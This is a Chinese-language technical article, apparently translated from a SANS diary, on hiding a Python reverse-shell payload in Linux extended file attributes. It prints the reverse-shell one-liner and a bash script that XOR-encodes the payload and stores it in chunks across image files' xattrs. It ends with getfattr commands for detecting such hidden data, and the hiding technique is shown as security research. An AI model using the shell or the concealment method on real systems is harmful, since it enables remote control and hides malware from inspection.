利用Linux扩展文件属性隐藏恶意负载的技术分析

在Linux扩展文件属性中隐藏负载

本周SANSFIRE1期间,作者参加了FOR5772培训。第二天课程涉及不同文件系统及其数据组织方式。在Linux生态中,多数文件系统(ext3/ext4/xfs等)支持"扩展文件属性"(xattr),该功能允许用户为文件添加元数据。这些数据不会直接展示给用户,可包含任意与文件相关的内容(如作者名、简要描述等)。该功能类似于Windows NTFS文件系统中的备用数据流(ADS)。

使用方式

Ubuntu系统通过"attr"软件包提供操作工具:

bash 复制代码
remnux@remnux:~/malwarezoo/xattr$ setfattr -n user.note -v "Hello ISC!" sample.txt 
remnux@remnux:~/malwarezoo/xattr$ getfattr -d -n "user.note" sample.txt 
# file: sample.txt
user.note="Hello ISC!"

注意属性前缀"user"称为类别(class),当前定义有四种类别:security、system、trusted和user。

恶意利用实验

课程讨论中产生了一个想法:"能否利用此存储空间隐藏恶意内容?"作者随后开发了概念验证(PoC),使用扩展属性存储经过处理的Python反向Shell代码。

负载编码方案

  1. 将负载分割为多个文件(每份32字节)
  2. 使用单字节密钥(0xFB)进行XOR加密
  3. Base64编码处理

示例负载是一个连接127.0.0.1:4444的Python反向Shell:

python 复制代码
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

编码脚本

bash 复制代码
#!/bin/bash
# 将负载编码到扩展属性中

PAYLOAD='import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

CHUNK_SIZE=32
CHUNKS=()
i=0
# 将负载分割为32字节的块
while [ $((i * CHUNK_SIZE)) -lt ${#PAYLOAD} ]; do
  CHUNK=${PAYLOAD:$((i * CHUNK_SIZE)):CHUNK_SIZE}
  CHUNKS+=("$CHUNK")
  ((i++))
done

# 编码并保存扩展属性
echo "Payload:"
echo $PAYLOAD
echo
echo "分块数量: ${#CHUNKS[@]}"
for idx in "${!CHUNKS[@]}"; do
  cp isc.png picture-$idx.png
  echo -n ${CHUNKS[$idx]} \
    | python3 -c "import sys; sys.stdout.buffer.write(bytes([b ^ 0xFB for b in sys.stdin.buffer.read()]))" \
    | base64 -w0 > tmp && mv tmp "picture-$idx.b64"
  echo "CHUNK$((idx + 1)) = ${CHUNK[$idx]} ($(cat picture-$idx.b64))"
  setfattr -n user.payload -v "$(cat picture-$idx.b64)" picture-$idx.png
  rm picture-$idx.b64
done

解码实现

作者用C语言编写了PoC程序3,可提取并重组隐藏负载:

bash 复制代码
remnux@remnux:~/malwarezoo/xattr$ ./poc picture-0.png picture-1.png picture-2.png picture-3.png picture-4.png picture-5.png picture-6.png
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

防御检测方法

使用getfattr命令递归扫描系统:

bash 复制代码
remnux@remnux:~/malwarezoo$ getfattr -Rd -m- . | grep "^# file:" | cut -d ":" -f2
xattr/picture-2.png
xattr/picture-0.png
xattr/picture-5.png
xattr/picture-1.png
xattr/sample.txt
xattr/picture-3.png
xattr/picture-6.png
xattr/picture-4.png

需注意操作系统本身也会大量使用此功能,如存储POSIX ACL:

bash 复制代码
remnux@remnux:~/malwarezoo$ sudo getfattr -m- -d /var/log/journal
getfattr: Removing leading '/' from absolute path names
# file: var/log/journal
system.posix_acl_access=0sAgAAAAEABwD/////BAAFAP////8IAAUABAAAABAABQD/////IAAFAP////8=
system.posix_acl_default=0sAgAAAAEABwD/////BAAFAP////8IAAUABAAAABAABQD/////IAAFAP////8=

1 www.sans.org/cyber-secur... 2 www.sans.org/cyber-secur... 3 github.com/xme/SANS-IS...

复制代码
相关推荐
成都渲染101云渲染66661 天前
如何在3ds Max中实现更快、更高质量的渲染
前端·javascript·人工智能
墨风如雪1 天前
我和 Fable 5 聊了一晚上 AI,得出的结论大吃一惊
aigc·ai编程
十铭忘1 天前
MOTIONGPT3:人类运动作为第二模态
人工智能
weigangwin1 天前
采用 mem0 之前,先决定 Agent 到底允许记住什么
人工智能·opencv·ai·llm·memory·ai agent·mem0
木木学AI1 天前
AI客服系统技术选型:Agentic架构与传统规则引擎的能力差异评估
人工智能·架构
hhzz1 天前
Python大数据实战(十六):音乐推荐系统——基于协同过滤算法构建个性化歌单引擎
大数据·人工智能·python·数据挖掘·数据分析
带娃的IT创业者1 天前
突破算力与安全的边界:深度解析 Mythos AI 的“受信发布”机制与技术影响
人工智能·安全·大语言模型·ai安全·mythos ai·受信发布·ai监管
dreamread1 天前
2026紫微八字同排工具怎么选:看盘面切换、功能边界和学习路径
人工智能·软件工具·传统文化
耍酷的魔镜1 天前
核心设计理念:5W2H、JSON-LD 与通用知识图谱
人工智能·json·知识图谱
SRET1 天前
Mineradio 沙盒隔离安装完全指南 | 一键安全运行 Electron 应用!!!
javascript·经验分享·安全·electron·aigc·音视频·ai编程